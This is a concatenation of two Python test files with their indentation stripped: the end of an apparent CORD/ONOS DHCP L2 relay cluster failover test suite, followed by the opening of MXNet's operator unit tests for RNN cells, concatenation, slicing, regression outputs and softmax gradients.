cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
self.cord_test_onos_restart(node = master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_on_cluster_with_standby_controller_only_restarts(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
self.cord_test_onos_restart(node = standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_removing_master_onos_instance(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_removing_onos_instance_member(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_toggle_master_onos_instance_membership(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_toggle_standby_onos_instance_membership(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_adding_onos_instance_member(self, iface = 'veth0'):
pass
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if type(grad_req) is dict and grad_req['data'] == 'null' or grad_req == 'null':
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
